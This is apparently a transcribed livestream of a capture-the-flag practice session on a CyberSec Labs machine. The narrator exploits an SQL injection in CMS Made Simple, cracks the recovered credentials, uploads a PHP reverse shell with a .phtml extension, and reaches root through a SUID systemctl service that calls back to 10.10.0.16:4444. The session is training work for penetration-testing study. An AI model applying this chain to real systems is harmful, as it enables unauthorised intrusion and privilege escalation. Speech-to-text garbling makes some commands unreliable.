Or if you want, during your test, I don't know if you're allowed to do this or not, but you can give me a call on Discord and I'll give you a let's go. Alright? No matter what, I'm just going to yell let's go. I'm going to answer and let's go! Just like that. I don't know if you did something good, bad, I have no idea. I'm just yelling let's go though. Alright. If you're allowed to. You can put it on speaker or whatever. Just so the proctor knows that you're not actually doing anything wrong. Just going to yell let's go and hang up. Let's go and map this guy for simple. CD back, make directory, simple. And we'll go ahead and we will unmap tac. Start off with that for, I believe it was .2. We got port 80 and 22. Let's go and unmap that port 80. Let's go and check him out. Good morning, Arzon3. How you doing? CMS made simple. Now, I've seen this before. Version 2.2.4 it looks like down there. And so let's go ahead and do a search exploit on simple. We have CMS made simple. Version 2.2.4 we had. Okay, it doesn't look like we're getting anywhere with that guy just yet. Okay, 2.2.4, right? So there's an SQL injection maybe for it. I wonder if any of these were fixed, or if that remote code, authenticated remote code execution was fixed. I wonder if any of those were ever fixed, or if they didn't fall within that time frame of it, if they weren't jacked up like that at that point. Let's go ahead and do a Ferox Buster on it. Thinking we should probably have one of those guys should probably work. That's what I'm thinking. I don't know which one, but I'm going to go with maybe the SQL injection. Let's start up a Ferox Buster on it, and then we'll try the SQL injection. On .2, right it was. And let's try this SQL injection over here. Let's go and grab that. We do have a /uploads also. Might be able to do something with that. We'll have to check that out. Search exploit, tac-m. Let's go ahead and cat that 46635.py. See what we got here. Probably should sublime text them actually. Alright, so we got URL, a word list, and crack. Specify URL, example usage, no cracking password, exploit.py, blah, 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 target URI. What if we just use SQL map, in all honesty? Where's it going to? What if we just grab that site and just use SQL map? We want to specify URL. Let's just throw this at it for now. Let's see what happens here. Alright, mispronunciation is called print. Did you mean print ... Let's go ahead and mess with that file like a little bit, I guess. That's all the way up top. I don't really care if it prints out that guy like right there. We specified, oh, maybe I got to attack you. Maybe that's why. Maybe I should actually read the damn thing, huh? It says, if not, then to do this. All right. I'm doing pretty good. How you doing? It's a beautiful day today. Let's actually look at what... One second. Because I messed with this stuff before. And I don't know if we have everything that it needs. It might just be I'm just an asshole like right now. Yeah. Okay. Oh, we do have that. So your line... This one's saying that term color does not exist, but it does. It's already satisfied, both with pip 2 and pip 3. This exploit might be so damn old that we're going to have a problem actually getting it running. Alright, there we go. Okay. Let's try that. Let's go. Okay. Specify URL of the target. We need to attack you, obviously. We didn't need those colors. That was a big deal, like right there. Did need that. Okay, there we go. I'll say like this thing is taking a minute. Thought it was stuck, but it wasn't. Maybe I should give it a word list. Just go and stop that. Attack W. Something like that. You just share wordless rocket.txt. Didn't like that at all. It was not reset by me. Well, it's not reset by Peer, though. Alright, looks that one a little bit better now. Let's go. There we go. Okay. A little bit better. We also have that slash uploads up here, too, right? Yeah, this thing's all jacked up, isn't it? It's a 301 though. I feel like we're going to have to be logged in to really be able to do anything to this guy, like right here. Search, uploads index, uploads image index, assets. Oh, we found a salt. Okay. We're getting there. Nothing much, Boo-Foo. We're back at CyberSec Labs. We're going to do all the Linux machines today. We've done quite a few so far. We were going to do the black boxes. I did black box 1, and then INE's site failed after that. Like, it went down. So, looks like we're not doing black box 2 or 3 today. So I decided, well, screw it. We'll get on CyberSec Labs. I was going to do this next weekend, but I was like, well, screw it. We'll try them all the Linux boxes today. Since we did all the Windows ones yesterday, let's try all the Linux ones today. We found one user. I wonder if I was supposed to do a crack with that. Yeah, we completed all the Windows ones yesterday. So we spent one day, 15 hours. We did all the Windows and Active Directory ones. So these guys are all completed. Bam. And then Active Directory, we completed all of those. So now we're on the Linux ones. And we have quite a few left. And we'll see how it goes. Maybe I should do a crack with that. Use attack C for crack. According to the documentation for it. Hey, thanks a lot for the follow, Nick NR. Oh, stuck in quarantine. Hate to see it. That's kind of what I figured. Well, that's not what I figured, but I don't think we're going to be able to get into uploads. It doesn't look like mmap found anything else also. It looks like mmap, he's 71% of the way done. He still only has 22 and 80 up like right now. So we're still looking at just this this CMS made simple thing with the exploit for that time, for the SQL injection. Probably got it. I think we all had it in North Carolina before it came out around the June. Everyone was getting sick. Everyone had different symptoms. Hospitals didn't know what it was. They all thought it was the flu. They're like, this isn't the flu. So, and then all of a sudden, a month and a half, 2 months later, Corona came out. And it was like, huh. I think we all had that, which makes sense too, because, you know, it's Lejeune. It's Marine Corps base. People deploy out of there all the time. So someone was somewhere else in some other country that didn't know what it was yet, came back. It just exploded. Because we had it around Thanksgiving time frame. And it wasn't out yet. Didn't come out yet. Well, we'll just say didn't exist. But obviously after that, everyone was like, oh, pretty sure we know what we had. Email found, DQ. It's a good email, like right there, DQ. Okay. We're doing pretty good so far. I don't know what the hell that means. I wonder if we could do a little... I wonder if this is going to kill it. Looks like it's killing it. We'll just do something like that. No, Bufu. No, thank you. I'm pretty sure we got what we're supposed to do. It just is failing, that's all. I'm pretty sure we got it. Let me go ahead. It has to do something with the considerable lagging. It's unreliable. It takes ages. I mean, it happens. So the last one, Oreo saved us on the last one. We couldn't get in. And then all of a sudden, he was like, hey, try this because it was a super old version of SSH. We're actually getting a much longer username now. David? David? David! Got it! David! David? David. All right, we got a username. Let's go! We got ourselves a freaking username. Let's freaking go. Was this the email? Is that what we got here? David? No, go into capitals. At. I'm going to go with simple. It's like a really bad game. Oh, shit, we got that. Shit, I got an idea. We got that like right there. Hey, thanks a lot for a follow with that too. We got that. I wonder if this is going to explode it. This might actually explode it. The box may literally, the server may literally explode inside CSL. It's not that one like right there. Here we go. Think it's going to explode? Hey, thanks, Dad, too. You got to keep that energy high. Are we going to explode this box? Not getting anything that's drastically different from everything else for the login page. We'll let that guy run to the top 3,000, like right there. And Rocky.txt. And then we'll go from there. This guy looks like he's getting the hash though over here. For the password. So we might just be able to grab that also and crack it. But we did tell it to crack, so he might try to crack it afterwards. But we also got Zap running too, which you cannot use during OSCP. Don't use Zap to crack into something. 2 hours later, sit here, melting away. I'm going to go grab an orange drink while this guy's doing his thing. I'll be right back. All right, bad news. I'm officially out of soda. The Pepsis are gone. The sun-kissed orange is gone. This is the worst day ever. Yeah, we're not getting anything that's drastically different from everything else, huh? Okay. Nothing. Alright, so nothing drastically different, so we won't know. Probably get this hash. And we'll let this guy crack it, I guess. Now crack. Oh, okay, no, that was easy. Alright, so he cracked the password. I thought he was going to take a minute to crack the password. He cracked that super fast. Alright, so we got David and Punisher as the password. Alright. I've never actually gotten into CMS Made Simple. I'm going to go with it. It's going to be the same exact kind of thing as WordPress. Never actually gotten into this guy. So okay. Okay, we can take that. Let me go ahead and make a little cheat sheet thing here for web, and then we'll do a CMS Made Simple. Should probably just make like a whole like CMS page, huh? And then start dropping stuff down into these guys. Fuel CMS, PHP My Admin. I mean, that's kind of a C. I'll throw it in CMS. WordPress. Tomcat can go down there. Alright, we'll leave it like that. So we are on CMS Made Mad Simple, from what I said. Let's go ahead and change that. CMS Made Simple. We got an upload page. I feel pretty confident about that. Okay. I don't know. I don't know. I know that these are old as shit, these boxes. Like a couple years old. Let's go ahead and grab a CD into tools. And let's go ahead and do a nano PHP or shell.php. And we'll throw my P address into here for 10.10.0.16. Looks like we're going port 1111. Let's go ahead and do that. And C tech LVMP 1111. And I guess we're just going to try to throw this guy in there. And then go to that page, I would think. Let's go ahead and go to, yeah, it's in desktop. No, it's not. It's in tools. And it's called shell.php. There we go. All right, that guy's in there. Was that it? Did he upload? Did I do it? Can I now upload a PHP shell? That's something I can't do. Where'd it go? Maybe I just can't upload a PHP shell. Okay. Let's try... Maybe it just doesn't like PHP. Let's try to... copy into shell.phml. Let's go and try that. Let's go. Okay. So all right, cool. I mean, we probably could if we went to burp suite. That's if it's actually sending across that there is some type of file extension thing in place. Might just be on the server itself, and we might not be able to see it. Some sites you can actually see it, what it allows to be uploaded, things like that. Or they might have like a blacklist or like a whitelist or something like that that's allowed to be uploaded, but usually you can't actually see that. Usually it's on the server itself and you don't get to see it. Or else you would know how to bypass it. Let's figure everything else in here is PHP, so why not? But obviously we can't just upload a PHP file. So I'm going to go and click on that guy and we get a reverse shell. We do. Alright, cool. That one's filtered. We didn't get anything else in there. Alright, let's go into a which Python. Which Python 3. Cool. Scripts, full shell. Let's go ahead and grab this guy at full shell and we'll go from there. Just want to see. Control Z, STTY, TAC A, STTY raw, enter twice, export, term equals X term, what was it, set, STTY, rows is going to be 26, columns is 173, alright. From here, let's go ahead and do a CD into home. See what else is on this machine. CD and David. Cat that. What the fuck? Obviously, this machine has not been started or reset in a long time. Because somebody else was doing something in here. He used lin enum. Ew. Ew. Who did that? Ew. Alright, what are we on? Which one are we on now? Simple? Hey, thanks a lot for the follow, Viztex. I think we're on simple. We're just going to throw a thing in there and see what happens. Yep, we are on simple. Okay. Well, obviously, simple CMS. That makes sense. Oh. I can't believe you used that. Alright, let's go ahead and CD into var backups. Got a lot of backups in here. A lot of them can only be read by root, though. Not doing too much with that, like right there. What is my... I'm in a sudo directory. Let's go ahead and cat scripts SUID lookup. Hey, thanks a lot for the follow, Dungeoneer 3. See if we do anything with this guy. Not looking like it just yet. Oh, we got system CTL. I think, yeah, we can. GTFO bins. System CTL with SUID. Right. And pretty much we just copy paste that guy. I messed up. Maybe I didn't. Alright, let's go ahead and do it one at a time here. I should probably go into into right where was that too, huh? Into bin. Let's CD in the bin. And then we can copy paste this guy. I think I've done it all once before, not like one at a time. I think I've just whoop, go for it. Okay, let's do it one at a time. We got that. We got that. Type equals one shot. This guy wants to do a bin sh ID and /temp output. So we can try that like right there. See if that works. Huh. Okay. We have systemctl. Maybe because that... Let's go ahead and start over. Maybe we need to actually change out the execute start. We also get a reverse shell with this too, I think. I think we can do... I think we could do, what is it? Like, maybe it needs bin bash. Maybe it's not bin sh. Let's try it like that. Just try it. Should be putting in a temp output. And then if not, we'll do a bin cat. And we'll look for, we'll just grab that system.txt one. /systemctl. I don't think I forgot the first ones. No, I didn't forget on the first ones though. We're in bin, right? Systemctl is right there. What's it talk about? No service. Make temp.service. Yeah. Okay, let's do something like this. My service. There. We'll do that. Okay. We'll throw the rest of this in there. We'll see if that works. Service.service does not exist. I know, it's because I made it my service. Hey, thanks a lot for the follow, Cody Gray. Maybe that one doesn't exist, like right there. That's good, okay. Finally, you can run any of those folders in the path. You may be able to escalate privileges. You need to search for relative paths based on service configuration files. Like, done system CTL before. Never had a problem with it. Hey, thanks a lot for follow, Alan Sue. Yeah, let's do that. Let's try something like what this guy has, like right here. If she had a copy and paste, that'll make our lives a lot easier. Let's go ahead and yeah, I'm thinking about doing pretty much what this guy has, like right here, something like this, where we make a reverse shell back to us or whatever. And we'll do a root. Before we can actually do our root service file, we need to place it into a target file system. If it's not already there, once that is done, we need to use system CTL to start our custom service. To do this, we first need to set up our listener. Alright, so let's go ahead and do a, so he's in bin, system CTL, enable, home, whatever, root.service. So let's go ahead and make that root service first. Hey, thanks for the follow. Warning, X06. Let's go ahead and do that. Let's go ahead and make our service first. How about that? Let's go ahead and we'll CD into desktop, cybersec, simple. And let's go ahead and make our service first. So we pretty much want to make a service, right? Make something like what this guy kind of has. Nano root.service, we'll call it. Service type equals simple. User equals root. Start equals /bin bash taxi bash tac I. He's just doing a reverse bash shell. Do it /4444. Install. Wanted by multi-user.target. Okay. Now we can go ahead and put this on the file machine here. CD into home, David, and we'll do a wget 10.10.0.16 /root.service. Start up our web server. Let's go ahead and grab that. Okay, so we got that now over there, right? So now let's go back. Well, let's start up a listener for 4444, right? Let's go ahead and CD back into bin. And let's go ahead and do a system CTL enable that guy. System CTL enable home David root.service. Okay. And then we just need to do a system CTL start root, it looks like. And we get a thing back as root down here. Let's go. Let's freaking go. Nice. All right, I want to actually copy that guy like right there. After we're done with this, we'll copy him. Let's cd into root and cat that system.txt. There's probably about 18 million ways we could have done that, but we picked that way. Probably just could have catted it, in all honesty, and had it output to a file for you that you could read. So I want to go ahead and actually cat my root.service. I'm just going to say if systemctl. Let's go ahead and do a Linux one. Privesc. And we're going to do systemctl in here. Root.service machine. From there we need to tell systemctl where to pull it from. So let's go ahead and grab that. So I did a little let's just gonna do a little print screen like right here. Copy that. Throw that back over to here. Listener started beforehand, and you will catch a root shell. There. Next one we are going to go after, it's going to be shares.